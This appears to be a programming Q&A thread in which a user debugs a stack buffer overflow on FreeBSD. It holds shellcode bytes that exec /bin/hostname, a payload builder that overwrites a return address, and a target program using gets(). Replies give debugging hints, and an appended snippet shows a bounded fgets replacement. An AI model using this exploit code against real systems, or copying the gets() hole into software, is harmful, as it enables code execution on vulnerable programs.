
Buffer Overflow-Not getting the Correct output

The shellcode prints the hostname (bin/hostname), but when I execute the code it shows me the path in reverse order and does not print the hostname. I am actually doing a buffer overflow. I am using a FreeBSD Intel machine. This is my code:

Can you please figure out where the error is?

//Prog 1
    #include<stdio.h>
    main()
    {
    char shellcode[]= “\x31\xc0\x50\x68\x6e\x61\x6d\x65\x68\x68\x6f\x73\x74\x68\x62
       \x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x54\x53\xb0\x3b
               \x50\xcd\x80”;
     int i;
     char buf[108];
     i=strlen(shellcode); 
     printf(“%d”,i);
     strcpy(buf,shellcode);
     for(i=36;i<104:i++)
     {
      buf[i]='b';
     }
     buf[104]='\x2c';
     buf[105]='\xfa';
     buf[106]='\xbf';
     buf[107]='\xbf';

     printf(“%s”,buf);
         return 0;
    }   

The above program is injected into the program below, so it creates the buffer overflow and prints the hostname:

    #include <stdio.h>
    int
    main (int argc, char **argv){
        char buf[100];
        printf("Please Enter your Name");
        fflush(stdout);
        gets(buf);
        printf("Hello  %s \n",buf);
    }
    void notcalled(void){
    //puts("cccc");
    }


  1. You are defining int I; and using i
  2. The for is using a :i++, instead of a ;i++
  3. strncpy() is missing the size_t param too


There is no buffer overflow in this sample code. You are simply printing the shell code, instead of executing it.

The code as posted doesn't even compile, due to things like quotes, i vs I problem, : instead of ; and strncpy needing 3 arguments (possibly more errors).

The shell code may be correct for FreeBSD, I can't check that. It definitely isn't correct for Linux, though.


Apparently you are still not triggering code execution, even though now I see where you have your buffer overflow. Note however that overflowing the buf variable is trying to overwrite the return address for main, so it should print the text in any case. Also, the compiler may have generated a different stack layout than what you expect, or maybe your stack is not executable (although you should get a segfault in this case).

Use a debugger to single step through the code, beginning with the "return" statement in main and see what is happening. You will soon reach a RET instruction which should pop the starting address of your shellcode into the instruction pointer, effectively jumping to it. I suspect that is not happening for some reason.
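
The target program in the question reads the name with gets(buf) into a 100-byte stack buffer, so nothing stops the 108-byte input from running past it toward main's return address. As an added example (not part of the original thread), here is a bounded replacement for that read; `read_name`, `NAME_BUF_SIZE` and the status codes are hypothetical names chosen for this sketch:

```c
/* Added example: bounded replacement for the gets(buf) call in the
 * question's second program. All names here are hypothetical. */
#include <stdio.h>
#include <string.h>

#define NAME_BUF_SIZE 100   /* same capacity as buf[100] in the question */

enum read_status { READ_OK = 0, READ_TRUNCATED = 1, READ_EOF = -1 };

/* Reads one line from `in` into dst (capacity cap, always NUL-terminated).
 * Bytes that do not fit are discarded up to the newline, so an overlong
 * line can neither run past dst nor spill into the next read. */
enum read_status read_name(FILE *in, char *dst, size_t cap)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) {
        if (cap > 0) dst[0] = '\0';
        return READ_EOF;
    }
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';            /* complete line: strip the newline */
        return READ_OK;
    }
    if (len < cap - 1) return READ_OK;  /* final line without a newline */
    int c, dropped = 0;                 /* buffer full: drain rest of line */
    while ((c = fgetc(in)) != '\n' && c != EOF)
        dropped++;
    return dropped ? READ_TRUNCATED : READ_OK;
}

int main(void)
{
    char buf[NAME_BUF_SIZE];
    printf("Please Enter your Name");
    fflush(stdout);
    enum read_status st = read_name(stdin, buf, sizeof buf);
    if (st == READ_EOF) return 1;
    if (st == READ_TRUNCATED)
        fprintf(stderr, "input longer than %zu bytes was cut\n", sizeof buf - 1);
    printf("Hello  %s \n", buf);
    return 0;
}
```

With this read in place, a 108-byte line is cut at 99 bytes plus the terminator, so the bytes the question places at offsets 104 to 107 never reach the stack.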
